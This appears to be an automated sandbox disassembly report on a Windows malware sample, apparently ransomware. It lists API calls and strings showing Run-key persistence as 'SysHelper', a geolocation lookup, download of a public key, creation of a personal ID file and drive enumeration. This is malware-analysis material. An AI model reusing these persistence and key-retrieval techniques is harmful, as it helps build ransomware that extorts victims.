                                                                                                control_flow_graph 1583 412220-41228a call 42f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 4122bd-4122d1 K32EnumProcesses 1583->1586 1587 41228c-4122ba LoadLibraryW GetProcAddress * 3 1583->1587 1588 4122d3-4122de 1586->1588 1589 4122df-4122ec 1586->1589 1587->1586 1590 412353-41235b 1589->1590 1591 4122ee 1589->1591 1592 4122f0-412308 OpenProcess 1591->1592 1593 412346-412351 CloseHandle 1592->1593 1594 41230a-41231a K32EnumProcessModules 1592->1594 1593->1590 1593->1592 1594->1593 1595 41231c-412339 K32GetModuleBaseNameW call 420235 1594->1595 1597 41233e-412343 1595->1597 1597->1593 1598 412345 1597->1598 1598->1593
                                                                                                APIs
                                                                                                • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                • API String ID: 3668891214-3807497772
                                                                                                • Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                • Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 0041F15E
                                                                                                • Sleep.KERNEL32(?), ref: 0041F185
                                                                                                • Sleep.KERNEL32(?), ref: 0041F19D
                                                                                                • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                                                                                                  • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                  • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                  • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                • String ID: C:\
                                                                                                • API String ID: 3672571082-3404278061
                                                                                                • Opcode ID: d5a943706acf03761f05e91da9d7afe69e2138b39c59b9afd056b2954a2c4063
                                                                                                • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                                                                                                • Opcode Fuzzy Hash: d5a943706acf03761f05e91da9d7afe69e2138b39c59b9afd056b2954a2c4063
                                                                                                • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2199 41bae0-41bb0d 2200 41bba0-41bba7 2199->2200 2201 41bb13 2199->2201 2204 41bf3d-41bf47 2200->2204 2205 41bbad-41bbae 2200->2205 2202 41bb15-41bb1a 2201->2202 2203 41bb54-41bb5e 2201->2203 2206 41bb47-41bb4f PostQuitMessage 2202->2206 2207 41bb1c-41bb1f 2202->2207 2210 41bf81-41bf97 2203->2210 2211 41bb64-41bb68 2203->2211 2208 41bf49 2204->2208 2209 41bf5c-41bf63 2204->2209 2212 41bbb0-41bbd4 DefWindowProcW 2205->2212 2213 41bbd7-41bc45 call 420c62 GetComputerNameW call 413100 call 41ce80 2205->2213 2206->2210 2207->2210 2215 41bb25-41bb28 2207->2215 2216 41bf50-41bf54 2208->2216 2217 41bf65-41bf71 IsWindow 2209->2217 2218 41bf9a-41bfc2 DefWindowProcW 2209->2218 2219 41bb75-41bb9d DefWindowProcW 2211->2219 2220 41bb6a-41bb6e 2211->2220 2233 41bc47-41bc4c 2213->2233 2234 41bc7b-41bc80 2213->2234 2215->2212 2222 41bb2e-41bb31 2215->2222 2216->2218 2223 41bf56-41bf5a 2216->2223 2217->2210 2224 41bf73-41bf7b DestroyWindow 2217->2224 2220->2211 2225 41bb70 2220->2225 2222->2210 2227 41bb37-41bb42 call 411cd0 2222->2227 2223->2209 2223->2216 2224->2210 2225->2210 2227->2217 2235 41bc5a-41bc76 call 4145a0 2233->2235 2236 41bc4e-41bc57 call 422587 2233->2236 2237 41bc82-41bc8b call 422587 2234->2237 2238 41bc8e-41bcb1 2234->2238 2235->2234 2236->2235 2237->2238 2239 41bcb3-41bcbc call 422587 2238->2239 2240 41bcbf-41bcf1 call 420bed 2238->2240 2239->2240 2250 41bcf7-41bcfa 2240->2250 2251 41befb-41bf0f IsWindow 2240->2251 2252 41bd00-41bd04 2250->2252 2253 41bf11-41bf18 2251->2253 2254 41bf28-41bf2d 2251->2254 2257 41bee5-41bef1 2252->2257 2258 41bd0a-41bd0e 2252->2258 2253->2254 2255 41bf1a-41bf22 DestroyWindow 2253->2255 2254->2210 2256 41bf2f-41bf3b call 422587 2254->2256 2255->2254 2256->2210 2257->2252 2261 41bef7-41bef9 2257->2261 2258->2257 2260 41bd14-41bd7b call 414690 * 2 call 40eff0 2258->2260 2269 41bee1 2260->2269 2270 41bd81-41be44 call 41c330 call 419d10 call 41c240 call 41b680 call 41b8b0 call 414690 call 41ce80 call 4131d0 2260->2270 2261->2251 2261->2254 2269->2257 2287 41be55-41be81 2270->2287 2288 41be46-41be52 call 422587 2270->2288 2290 41be83-41be8c call 422587 2287->2290 2291 41be8f-41bedf CreateThread 2287->2291 2288->2287 2290->2291 2291->2257
                                                                                                APIs
                                                                                                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                • _malloc.LIBCMT ref: 0041BBE4
                                                                                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                • _free.LIBCMT ref: 0041BCD7
                                                                                                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                • IsWindow.USER32(?), ref: 0041BF69
                                                                                                • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3873257347-0
                                                                                                • Opcode ID: 8daefccbac1f902a0bac6db861613c405983c54fd8b9b57708a0d4339297461f
                                                                                                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                • Opcode Fuzzy Hash: 8daefccbac1f902a0bac6db861613c405983c54fd8b9b57708a0d4339297461f
                                                                                                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2295 423576-42358f 2296 423591-42359b call 425208 call 4242d2 2295->2296 2297 4235a9-4235be call 42b420 2295->2297 2306 4235a0 2296->2306 2297->2296 2302 4235c0-4235c3 2297->2302 2304 4235d7-4235dd 2302->2304 2305 4235c5 2302->2305 2309 4235e9 call 42fb64 2304->2309 2310 4235df 2304->2310 2307 4235c7-4235c9 2305->2307 2308 4235cb-4235d5 call 425208 2305->2308 2311 4235a2-4235a8 2306->2311 2307->2304 2307->2308 2308->2306 2316 4235ee-4235fa call 42f803 2309->2316 2310->2308 2313 4235e1-4235e7 2310->2313 2313->2308 2313->2309 2319 423600-42360c call 42f82d 2316->2319 2320 4237e5-4237ef call 4242fd 2316->2320 2319->2320 2325 423612-42361e call 42f857 2319->2325 2325->2320 2328 423624-42362b 2325->2328 2329 42369b-4236a6 call 42f939 2328->2329 2330 42362d 2328->2330 2329->2311 2336 4236ac-4236af 2329->2336 2332 423637-423653 call 42f939 2330->2332 2333 42362f-423635 2330->2333 2332->2311 2340 423659-42365c 2332->2340 2333->2329 2333->2332 2338 4236b1-4236ba call 42fbb4 2336->2338 2339 4236de-4236eb 2336->2339 2338->2339 2350 4236bc-4236dc 2338->2350 2342 4236ed-4236fc call 4305a0 2339->2342 2343 423662-42366b call 42fbb4 2340->2343 2344 42379e-4237a0 2340->2344 2351 423709-423730 call 4304f0 call 4305a0 2342->2351 2352 4236fe-423706 2342->2352 2343->2344 2353 423671-423689 call 42f939 2343->2353 2344->2311 2350->2342 2361 423732-42373b 2351->2361 2362 42373e-423765 call 4304f0 call 4305a0 2351->2362 2352->2351 2353->2311 2358 42368f-423696 2353->2358 2358->2344 2361->2362 2367 423773-423782 call 4304f0 2362->2367 2368 423767-423770 2362->2368 2371 423784 2367->2371 2372 4237af-4237c8 2367->2372 2368->2367 2373 423786-423788 2371->2373 2374 42378a-423798 2371->2374 2375 4237ca-4237e3 2372->2375 2376 42379b 2372->2376 2373->2374 2377 4237a5-4237a7 2373->2377 2374->2376 2375->2344 2376->2344 2377->2344 2378 4237a9 2377->2378 2378->2372 2379 4237ab-4237ad 2378->2379 2379->2344 2379->2372
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 004235B1
                                                                                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                • __allrem.LIBCMT ref: 004236F3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                • __allrem.LIBCMT ref: 00423726
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                • __allrem.LIBCMT ref: 0042375B
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                • __invoke_watson.LIBCMT ref: 004237EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                • String ID:
                                                                                                • API String ID: 384356119-0
                                                                                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2380 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 2387 40cfb2-40cfb4 2380->2387 2388 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 2380->2388 2389 40d213-40d217 2387->2389 2393 40d000-40d01d 2388->2393 2391 40d224-40d236 2389->2391 2392 40d219-40d221 call 422587 2389->2392 2392->2391 2395 40d023-40d02c 2393->2395 2396 40d01f-40d021 2393->2396 2399 40d030-40d035 2395->2399 2398 40d039-40d069 call 4156d0 call 414300 2396->2398 2405 40d1cb 2398->2405 2406 40d06f-40d08b call 413010 2398->2406 2399->2399 2400 40d037 2399->2400 2400->2398 2408 40d1cd-40d1d1 2405->2408 2414 40d0b9-40d0bd 2406->2414 2415 40d08d-40d091 2406->2415 2410 40d1d3-40d1db call 422587 2408->2410 2411 40d1de-40d1f4 2408->2411 2410->2411 2412 40d201-40d20f 2411->2412 2413 40d1f6-40d1fe call 422587 2411->2413 2412->2389 2413->2412 2417 40d0cd-40d0e1 call 414300 2414->2417 2418 40d0bf-40d0ca call 422587 2414->2418 2420 40d093-40d09b call 422587 2415->2420 2421 40d09e-40d0b4 call 413d40 2415->2421 2417->2405 2431 40d0e7-40d149 call 413010 2417->2431 2418->2417 2420->2421 2421->2414 2434 40d150-40d15a 2431->2434 2435 40d160-40d162 2434->2435 2436 40d15c-40d15e 2434->2436 2438 40d165-40d16a 2435->2438 2437 40d16e-40d18b call 40b650 2436->2437 2442 40d19a-40d19e 2437->2442 2443 40d18d-40d18f 2437->2443 2438->2438 2439 40d16c 2438->2439 2439->2437 2442->2434 2445 40d1a0 2442->2445 2443->2442 2444 40d191-40d198 2443->2444 2444->2442 2446 40d1c7-40d1c9 2444->2446 2447 40d1a2-40d1a6 2445->2447 2446->2447 2448 40d1b3-40d1c5 2447->2448 2449 40d1a8-40d1b0 call 422587 2447->2449 2448->2408 2449->2448
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0040CF4A
                                                                                                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                Strings
                                                                                                • "country_code":", xrefs: 0040CFE1
                                                                                                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                • API String ID: 1485416377-2962370585
                                                                                                • Opcode ID: 5dc825e0eaabd0ce8c6fe2fa08b69a878812636430e6fc3930d7ad9179b00fc6
                                                                                                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                • Opcode Fuzzy Hash: 5dc825e0eaabd0ce8c6fe2fa08b69a878812636430e6fc3930d7ad9179b00fc6
                                                                                                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                APIs
                                                                                                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                • _memmove.LIBCMT ref: 0040C89F
                                                                                                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                • API String ID: 2864494435-54166481
                                                                                                • Opcode ID: ecc80bdb03f96bc0c849af2a7dce8c7fffdda80bc7aca4fdda24df6f4d0e1078
                                                                                                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                • Opcode Fuzzy Hash: ecc80bdb03f96bc0c849af2a7dce8c7fffdda80bc7aca4fdda24df6f4d0e1078
                                                                                                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$OpenQuery
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                • API String ID: 3962714758-1667468722
                                                                                                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0041E707
                                                                                                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                • InternetOpenW.WININET ref: 0041E743
                                                                                                • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                • _memmove.LIBCMT ref: 0041E838
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                • _strstr.LIBCMT ref: 0041EA36
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                • _malloc.LIBCMT ref: 0041EB86
                                                                                                • _memset.LIBCMT ref: 0041EB94
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                • _strstr.LIBCMT ref: 0041EBDA
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                • API String ID: 2805819797-1771568745
                                                                                                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 29327785-2616962270
                                                                                                • Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                • Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
